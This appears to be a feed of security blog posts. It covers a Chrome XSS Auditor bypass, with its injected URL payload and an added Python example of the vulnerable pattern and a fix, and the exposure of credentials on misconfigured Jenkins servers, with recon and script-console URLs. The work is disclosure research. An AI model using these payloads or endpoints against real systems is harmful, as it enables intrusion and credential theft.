<b>Update:</b> The bug has already been reported to the Google Chrome team. The details can be found here: <b><a href="https://code.google.com/p/chromium/issues/detail?id=330972">https://code.google.com/p/chromium/issues/detail?id=330972</a>. </b>The team was not able to recreate the issue in their test environment. I validated this issue on the Command and Control (C&amp;C) panel of a botnet :) and was not in a position to reveal the details of that panel. Anyway, the bug is in WontFix state and Google Chrome is still vulnerable to this type of XSS bypass.<br />
<br />
Recently, I encountered an XSS auditor bypass in Google Chrome ( &lt;= 32.0.1700.41 m Aura) while working on my research.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNwZC_ulkko2kHXyEjsjx8BtqYr-HT9uhOS-UbpKufFkZJroKHUSVXrJG5_R8quHjJp9hVBA7GYVZYdtOUK-VXi2zQQBi_1UVMFk2I1CmLMNHW1IOQO3QhhEYfbpnMg0CdGv2c-Q/s1600/google_chrome.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNwZC_ulkko2kHXyEjsjx8BtqYr-HT9uhOS-UbpKufFkZJroKHUSVXrJG5_R8quHjJp9hVBA7GYVZYdtOUK-VXi2zQQBi_1UVMFk2I1CmLMNHW1IOQO3QhhEYfbpnMg0CdGv2c-Q/s320/google_chrome.png" height="149" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Google Chrome Latest Version Tested !</b></td></tr>
</tbody></table>
The XSS Auditor in Google Chrome is a client-side XSS filter that blocks reflected XSS attacks outright. One point to keep in mind, though, is that the design of the web application also affects how the XSS Auditor behaves, and can create scenarios that are not expected. Let's analyze a bypass in the latest (and earlier) versions of the Google Chrome browser. The web page URL looks as follows:<br />
<blockquote class="tr_bq">
<b>http://www.example.com/index.php?m=login </b>which generates the form as follows:</blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFvI9S15lbrsT2O1QX4kS8fmG9hwW9zWPFZlaRpuJVcFb5LhwehOvp6qP3gckWdIONUpDs8IVNMGa_-FHYMwDKhuXleWix5_40QMYOxGjHlCRNc5pSNXVJ6kloQ7xQCjacGqLgqQ/s1600/form_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFvI9S15lbrsT2O1QX4kS8fmG9hwW9zWPFZlaRpuJVcFb5LhwehOvp6qP3gckWdIONUpDs8IVNMGa_-FHYMwDKhuXleWix5_40QMYOxGjHlCRNc5pSNXVJ6kloQ7xQCjacGqLgqQ/s640/form_1.png" height="180" width="640" /></a></div>
<br />
For Injection, we crafted the URL as follows:<br />
<blockquote class="tr_bq">
<b>http://www.example.com/index.php/" onmouseover="JavaScript:alert(document.location)" name="?m=login</b></blockquote>
In this injection we have not injected into the "m" parameter; instead we have played with the URI structure. The idea is to tweak the form layout rather than the value accepted by the "m" parameter, because the page reflects the request URI into the form, while the "m" value is still what it expects.<b> If you place your injection in the "m" parameter, it gets nullified by the XSS Auditor</b>. Let's see how the injection occurs:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdaFw8uQkJck4FjpU3JGdeecJlCwh2re7G5gI4gkolyDRKL0R_xXtxVc0O8CAB_b90lllf6zI7L4nhC8VAibIaa7qcbFEycxRAWPxbCeo66G1IqO8uQsVmdZ_Fvn4qljYldIg-Fg/s1600/form_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdaFw8uQkJck4FjpU3JGdeecJlCwh2re7G5gI4gkolyDRKL0R_xXtxVc0O8CAB_b90lllf6zI7L4nhC8VAibIaa7qcbFEycxRAWPxbCeo66G1IqO8uQsVmdZ_Fvn4qljYldIg-Fg/s640/form_2.png" height="182" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
As a result, Google Chrome XSS auditor is bypassed.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRQyMQ0uufD50qpjvo4In9P4N0-CdD79DeMYoQpd8OTFXTrWXfDYBNc9bl9hJn2wv21os7u-mUYvT3LInehDSOZvXpCjQK0GmUvhFCSm-msPz_ubvjaS2o6pzdLCObjpCkPvXfSg/s1600/gc_xss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRQyMQ0uufD50qpjvo4In9P4N0-CdD79DeMYoQpd8OTFXTrWXfDYBNc9bl9hJn2wv21os7u-mUYvT3LInehDSOZvXpCjQK0GmUvhFCSm-msPz_ubvjaS2o6pzdLCObjpCkPvXfSg/s640/gc_xss.png" height="324" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Inference:</b> Few ideas that should be taken into consideration:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
1. The design of the web application impacts the XSS Auditor.</div>
<div class="separator" style="clear: both; text-align: left;">
2. Instead of always targeting the HTTP parameters, also play around with the URI structure.</div>
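To make the mechanism concrete, here is an added example rather than code from the application in the post (which is not named): a login page that copies the raw request URI into the form's action attribute. That reflection is why a payload placed in the path, with ?m=login left intact at the end, rewrites the <form> tag itself instead of landing inside a parameter value. The /index.php script path, the handler names and the form markup are assumptions, and the XSS Auditor is not modelled; the example shows the application-side pattern and its fix.

```python
"""Added example (not the post's target application): a form whose action
reflects the request URI, vulnerable and hardened. Script path, handler
names and markup are assumptions."""
import html
from urllib.parse import urlsplit, quote


def vulnerable_login_page(request_uri: str) -> str:
    """Echo the request URI unescaped into action=, the pattern described
    above. Anything the client put in the path lands inside the tag."""
    return (f'<form action="{request_uri}" method="post">'
            '<input name="user"><input name="pass" type="password">'
            '<input type="submit" value="Login"></form>')


def hardened_login_page(request_uri: str) -> str:
    """Ignore the path the client sent: build the action from the script
    path the server knows, keep only the query string, and escape the
    result as an attribute value so no quote can close the attribute."""
    query = urlsplit(request_uri).query
    # '%' kept so an already-encoded query is not double-encoded.
    action = "/index.php" + ("?" + quote(query, safe="=&%") if query else "")
    return (f'<form action="{html.escape(action, quote=True)}" method="post">'
            '<input name="user"><input name="pass" type="password">'
            '<input type="submit" value="Login"></form>')


def form_action(page: str) -> str:
    """Read back the double-quoted action value from the rendered page."""
    start = page.index('action="') + len('action="')
    return page[start:page.index('"', start)]


def event_handlers(page: str) -> list:
    """Names of any on* attributes that ended up inside the first tag."""
    tag = page[:page.index(">") + 1]
    return [tok.split("=", 1)[0] for tok in tag.split() if tok.lower().startswith("on")]


# The crafted request from the post: injection in the path, m=login intact.
INJECTED_URI = '/index.php/" onmouseover="JavaScript:alert(document.location)" name="?m=login'
NORMAL_URI = "/index.php?m=login"

if __name__ == "__main__":
    print(vulnerable_login_page(INJECTED_URI))
    print(hardened_login_page(INJECTED_URI))
```

Because the path segment after /index.php is handled as PATH_INFO and the query still says m=login, the application serves the login form as usual; the only thing that changed is the tag it was written into, which is exactly the part a parameter-focused filter is not looking at.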
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Note:</b> Internet Explorer blocked this vector.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Additional Readings: Check out the inside details of Google Chrome XSS Auditor:</b></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul>
<li>XSS Auditor Source Code : <a href="https://code.google.com/p/webkit-mirror/source/browse/Source/WebCore/html/parser/XSSAuditor.cpp"> https://code.google.com/p/webkit-mirror/source/browse/Source/WebCore/html/parser/XSSAuditor.cpp</a></li>
<li>More about XSS Auditor Read here: <a href="http://www.collinjackson.com/research/xssauditor.pdf">http://www.collinjackson.com/research/xssauditor.pdf</a></li>
</ul>
<div class="separator" style="clear: both; text-align: left;">
Enjoy !</div>
<br /><div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com0tag:blogger.com,1999:blog-30098758.post-79878592127070577732013-08-25T22:35:00.000-07:002013-08-30T19:25:59.425-07:00CCTV Cameras : An Interview for Fact or Fictional Show : Revision 3!<div class="separator" style="clear: both; text-align: left;">
Recently, I did an interesting interview with Veronica from the Fact or Fictional show on the Internet. We discussed the issues and the technology behind CCTV cameras. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<center>
<iframe allowfullscreen="" height="360" mozallowfullscreen="" msallowfullscreen="" oallowfullscreen="" src="http://revision3.com/html5player-v24018?external=true&width=640&height=360" webkitallowfullscreen="" width="640"></iframe>
</center>
<br />
Do not forget to watch the movie on this topic, "Closed Circuit", starring Eric Bana and Rebecca Hall!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCgK0IPGk9V4E6DhLq0AwRmeIJ6cDYUYuz5kO_FzpZf5DmMFFYdulfOYlhbU1L9Ukr_LgYKME0qF7C7g3ksx36y8gufw9StEwF1RZJ9qX3nky_RJxPqZp5LfpZ9tHwIBVU4-vvZQ/s1600/closed.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCgK0IPGk9V4E6DhLq0AwRmeIJ6cDYUYuz5kO_FzpZf5DmMFFYdulfOYlhbU1L9Ukr_LgYKME0qF7C7g3ksx36y8gufw9StEwF1RZJ9qX3nky_RJxPqZp5LfpZ9tHwIBVU4-vvZQ/s200/closed.jpg" width="135" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Source: <b><a href="http://www.imdb.com/title/tt2218003/">http://www.imdb.com/title/tt2218003/</a></b></div>
<div class="separator" style="clear: both; text-align: left;">
Fact or Fiction Source: <b><a href="http://revision3.com/factorfictional/closed-circuit">http://revision3.com/factorfictional/closed-circuit</a></b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com1tag:blogger.com,1999:blog-30098758.post-41061188881545873452013-08-25T20:48:00.001-07:002013-08-25T20:48:50.355-07:00Protect Your Software Development Web Interfaces - Information Lumps: A Case Study of Jenkins !<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXYYrjDlki2JSzl-XHnVNhdd6cbLiO4_OJokJzMDH0tNsn8LaRvMYbM0zOGDmMim5xHjG7B3FN03rA506l6AWmGr1Gima1OrBlqGUMX3AT4Cucsv4jp4kjUX7HemNGBFeDfadxpw/s1600/jenkins.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXYYrjDlki2JSzl-XHnVNhdd6cbLiO4_OJokJzMDH0tNsn8LaRvMYbM0zOGDmMim5xHjG7B3FN03rA506l6AWmGr1Gima1OrBlqGUMX3AT4Cucsv4jp4kjUX7HemNGBFeDfadxpw/s1600/jenkins.png" /></a></div>
<div class="separator" style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 11pt;">Automation of software development
practices through applications has become the de facto standard in the security industry. Organizations
use support applications to reduce the workload of building and updating
software. The basic idea behind this
post is to check how security is structured for software management applications
such as Jenkins in real-world deployments, and what needs to be looked into while
performing security assessments. Before discussing further, let's talk about
Jenkins. According to the software website: "<i>Jenkins is an application that monitors executions of repeated jobs,
such as building a software project or jobs run by cron.</i>" For more
details, you can read here: </span><a href="https://wiki.jenkins-ci.org/display/JENKINS/Meet+Jenkins"><span style="font-size: 11.0pt;"><b>https://wiki.jenkins-ci.org/display/JENKINS/Meet+Jenkins</b></span></a><span style="font-size: 11pt;"><b>.</b></span></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<br /></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-size: 11pt;"><span style="font-family: Arial, Helvetica, sans-serif;">From a software development perspective, Jenkins provides an
integrated system which developers can use to manage software changes made
to specific projects. It has been noticed that, although organizations use this
software, misconfigured interfaces (not running behind a firewall and with
improper access rights) can have a substantial impact. From a security
perspective, exposure of an integrated system that manages the software development
model can become a sensitive risk. To prove this point, a case study of
the Jenkins application is discussed which shows how misconfigured
and exposed interfaces can result in security glitches. </span></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-size: 11pt;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-size: 11pt;"><span style="font-family: Arial, Helvetica, sans-serif;">These tests were conducted in an open environment. It has been
found that several big companies use Jenkins and, unsurprisingly, the
interfaces are exposed and running with improper authentication. In addition,
there are a number of Jenkins systems that are Internet-facing and expose a
plethora of information to attackers (remote users). A misconfigured
Jenkins server results in disclosure of critical information that can be used
in different sets of attacks. A number of misconfiguration issues that result
in information disclosure are presented below: </span></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-size: 11pt;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-size: 11pt;"><b><span style="font-family: Arial, Helvetica, sans-serif;">Note: Based on these security issues, a few vulnerabilities have been reported to industry leaders (organizations), which have acknowledged the issue. I will release the details once the issue is patched.</span></b></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<b><span style="font-size: 11pt; line-height: 115%;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></b></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><span style="font-size: 11pt; line-height: 115%;">Developers Information:</span></b><span style="font-size: 11pt; line-height: 115%;"> An exposed Jenkins interface
reveals information about the developers participating in the software
projects. It is possible to extract the user IDs of the registered accounts together with the
associated names. This is a substantial source of information about the
users of a specific organization. An example of the exposed user details is shown below:</span></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 11pt; line-height: 115%;"><br /></span></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjao8wTmPvreZJj_RWbOWOeQ4kj7eShyphenhyphenA7leO7i2m5V2idbEqYskL1PUVuKRfRbbTDxPJi0wb743q7gXs9dbpGTte5P5kFozzTWwNf6VJbUgKwQZ418fwufqZA09Fq4f2Tb9EasCQ/s1600/jenkins_1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjao8wTmPvreZJj_RWbOWOeQ4kj7eShyphenhyphenA7leO7i2m5V2idbEqYskL1PUVuKRfRbbTDxPJi0wb743q7gXs9dbpGTte5P5kFozzTWwNf6VJbUgKwQZ418fwufqZA09Fq4f2Tb9EasCQ/s1600/jenkins_1.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Exposed Developers Information !</b></td></tr>
</tbody></table>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: 'Times New Roman', serif; font-size: 11pt; line-height: 115%;"><br /></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><span style="font-size: 11pt; line-height: 115%;">Software
Builds Information and Source Code:</span></b><span style="font-size: 11pt; line-height: 115%;"> It is possible to gain
information about the software builds without any authentication (in misconfigured
scenarios). Information about the
changes in the software over a period of time reveals the
development flow of the components. The Jenkins application does not require any
explicit permission from the administrators to validate the user before
allowing access to the ongoing software builds. An
example is shown below:</span></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: "Times New Roman","serif"; font-size: 11.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: "Times New Roman"; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-fareast;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUYi76npP6VZEK3u_iqEbMGDJ4d50OKV8mAQWkf9LXmVD_uMlRgUMVKk55zoBU9QzQWUH6MaVp5akapQGHqejuNghtt8ifkkCPz693doP3hOVNUXUygFqd0B6t5BapJ2a2HIxRWw/s1600/jenkins_2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUYi76npP6VZEK3u_iqEbMGDJ4d50OKV8mAQWkf9LXmVD_uMlRgUMVKk55zoBU9QzQWUH6MaVp5akapQGHqejuNghtt8ifkkCPz693doP3hOVNUXUygFqd0B6t5BapJ2a2HIxRWw/s1600/jenkins_2.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Exposed Software Build and Version numbers !</b></td></tr>
</tbody></table>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">In
certain scenarios, it is also possible to download the source code from
Jenkins without any authentication. Although credentials are required to make changes to the code,
the fun part is that the code can be downloaded without them.
Take a look at the example shown below:</span></div>
<div class="MsoNormal">
<span style="font-family: "Times New Roman","serif";"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2tzpxKMx43se_bmrh3-61uLUWjsglcqMFDb4Xw2gaXewvZs9YUZ2WsFs3cwf40JfPblnDROGslZx_uouuZT-C9nOtILvBeE49mjZKCTkN9Im2p4cAKBNbzosB3JYDeW7j-phQug/s1600/jenkins_3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2tzpxKMx43se_bmrh3-61uLUWjsglcqMFDb4Xw2gaXewvZs9YUZ2WsFs3cwf40JfPblnDROGslZx_uouuZT-C9nOtILvBeE49mjZKCTkN9Im2p4cAKBNbzosB3JYDeW7j-phQug/s1600/jenkins_3.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Source Code Files !</b></td></tr>
</tbody></table>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><span style="font-size: 11pt; line-height: 115%;">Server-side Information Disclosure in Environment Variables: </span></b><span style="font-size: 11pt; line-height: 115%;">Access
to environment variables also provides a plethora of information. The example
presented below shows significant information about the configured MySQL
(JDBC) database server. An attacker can easily glean the username and password of
the database (SONAR_JDBC_USERNAME & SONAR_JDBC_PASSWORD) along with the
internal IP address and the port number on which the JDBC service is running. </span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 11pt; line-height: 115%;"><br /></span></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLeRhRKVvrzOiwJjJCfNfRoZURDc92hAFS_jGKlPpvqJqXcpRttI7DouJPqqWbt4jCk2AwkBexJb7mEP3tMZGpzMNRq-s9b9zKHazqlcivSDkMc40HT3pUYWZpQKwew5Zl8ajPew/s1600/jenkins_4.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLeRhRKVvrzOiwJjJCfNfRoZURDc92hAFS_jGKlPpvqJqXcpRttI7DouJPqqWbt4jCk2AwkBexJb7mEP3tMZGpzMNRq-s9b9zKHazqlcivSDkMc40HT3pUYWZpQKwew5Zl8ajPew/s1600/jenkins_4.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Revealed Environment Information !</b></td></tr>
</tbody></table>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 11pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal">
<b style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 11pt; line-height: 115%;">Exposure of Application Secret Data:</span></b><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt; line-height: 115%;"> During analysis, it has been found that a
number of server-side scripts have hard-coded critical information such as
secret keys and credentials, which can be exposed when console-output operations
are performed. The underlined example shows how a secret key is extracted by
accessing the console output. In this
example, the curl command uses a secret key to connect to a specific domain for
fetching JSON data through a GET request. Once this information is exposed, an
attacker can directly perform queries against the target domain. </span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: 'Times New Roman', serif; font-size: 11pt; line-height: 115%;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDUHrSRGFKV13ZmswKOAAHozzqRR9Q-nsUWCzMneRJvCrAa0anbti6n5ZBRdHPrXROIRYu85VdfI29z36LZ_BBmujkb6YS7nKGCuRKlquiNvTdhHpodAdbDbvjquECdAaGT64eCQ/s1600/jenkins_5.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDUHrSRGFKV13ZmswKOAAHozzqRR9Q-nsUWCzMneRJvCrAa0anbti6n5ZBRdHPrXROIRYu85VdfI29z36LZ_BBmujkb6YS7nKGCuRKlquiNvTdhHpodAdbDbvjquECdAaGT64eCQ/s1600/jenkins_5.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Revealed Secret Key !</b></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><span style="font-size: 11pt; line-height: 115%;">Cron Jobs Execution: </span></b><span style="font-size: 11pt; line-height: 115%;">It is also possible to start the cron jobs, which
reveal a plethora of information due to the use of debugging calls. Most
of the time, cron jobs produce a great deal of output showing the progress
of the running software. The example shown below presents the creation of a database
by a specific cron job in one of the vulnerable Jenkins configurations. It reveals
how the table of OAuth tokens is created and the index is generated. </span></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: 'Times New Roman', serif; font-size: 11pt; line-height: 115%;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikV6DvNpQEsTctiQkbc6FAJsgd_weWY9XefjSey1Y3oJ3CbKGibj9t-O6bszRClhyFBCs64z_YuQKF7b-7Zsn_tV7G4pN2YY8o1qFusBeBZPZ6ry0VqLAP8Ogh5jR5Gip90UJ8QA/s1600/jenkins_6.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikV6DvNpQEsTctiQkbc6FAJsgd_weWY9XefjSey1Y3oJ3CbKGibj9t-O6bszRClhyFBCs64z_YuQKF7b-7Zsn_tV7G4pN2YY8o1qFusBeBZPZ6ry0VqLAP8Ogh5jR5Gip90UJ8QA/s1600/jenkins_6.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Information Leakage through Cron Jobs !</b></td></tr>
</tbody></table>
<div style="margin-bottom: .0001pt; margin: 0in;">
<b><span style="font-size: 11pt;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></b></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<b><span style="font-size: 11pt;"><span style="font-family: Arial, Helvetica, sans-serif;">Information Disclosure in
Debug Errors:</span></span></b><span style="font-size: 11pt;"><span style="font-family: Arial, Helvetica, sans-serif;"> During a
quick check of certain Jenkins configurations, it has been noticed that the
Jenkins server does not handle requests to restricted resources in a secure
manner. An attacker can take additional steps to request access to restricted
resources in order to generate debug errors, as shown below: </span></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: 'Times New Roman', serif; font-size: 11pt; line-height: 115%;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8mJ_1xeA_WLD_PUk1CNCK7Gjpcr09n0u_MUrk-o0CKld41rgcVymvPO2fxxJXM6ZB4y8PC2GGM0c87tiAfEf___4dWGM_vXimUAssHO1RLQgW8kth1Sx-3Pu2yEhexjfcsxNY_Q/s1600/jenkins_7.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8mJ_1xeA_WLD_PUk1CNCK7Gjpcr09n0u_MUrk-o0CKld41rgcVymvPO2fxxJXM6ZB4y8PC2GGM0c87tiAfEf___4dWGM_vXimUAssHO1RLQgW8kth1Sx-3Pu2yEhexjfcsxNY_Q/s1600/jenkins_7.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Information Disclosure in DEBUG Errors !</b></td></tr>
</tbody></table>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-size: 11pt;"><span style="font-family: Arial, Helvetica, sans-serif;">Some of the standard requests specific to Jenkins are shown below:</span></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
</div>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt;">To
verify whether anonymous access is allowed in Jenkins, the link can
be fetched as: </span><b style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 11.0pt;"><a href="http://www.example.com/pview/">http://www.example.com/pview/</a></span></b></li>
<li><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt;">To
retrieve the system information, an attacker can try: </span><b style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 11.0pt;"><a href="http://www.example.com/systeminfo">http://www.example.com/systeminfo</a></span></b></li>
<li><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt;">To
access the script interface (command-line access), one can try: </span><b style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 11.0pt;"><a href="http://www.example.com/script">http://www.example.com/script</a></span></b></li>
<li><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt;">To
retrieve the Jenkins account sign-up page: </span><b style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 11.0pt;"><a href="http://www.example.com/signup">http://www.example.com/signup</a></span></b></li>
<li><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt;">To
create an account, send a direct request to: </span><b style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 11.0pt;"><a href="http://www.example.com/securityRealm/createAccount">http://www.example.com/securityRealm/createAccount</a></span></b></li>
</ul>
<div>
<b style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 11pt; line-height: 115%;">Explicit CSRF Protection:</span></b><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt; line-height: 115%;"> It is always good practice to analyze the
design of an application against security standards. Some security protections
should be deployed in the application by default. For example, Jenkins
provides a global security option in which protection against CSRF attacks has
to be explicitly checked. If this option is not checked, the Jenkins
application does not deploy the protection globally. During our analysis, it
has been noticed that a number of Jenkins systems are running without CSRF
protection, which makes them vulnerable to critical web attacks.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt; line-height: 115%;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGDcGHe5-ZAVvrSQGCZZid_xPxZYZOtD4GkkVMVAwa_SBc8pMbJyGo3JGUCgTu378B8VexS00EQ63n3_hdd05mFCf1URQGJpHOPTluZwug0f5THXXlfwl_CRNVN0NTy6gN5yvmQg/s1600/jenkins_8.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGDcGHe5-ZAVvrSQGCZZid_xPxZYZOtD4GkkVMVAwa_SBc8pMbJyGo3JGUCgTu378B8VexS00EQ63n3_hdd05mFCf1URQGJpHOPTluZwug0f5THXXlfwl_CRNVN0NTy6gN5yvmQg/s1600/jenkins_8.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Explicit Security Configuration !</b></td></tr>
</tbody></table>
<div>
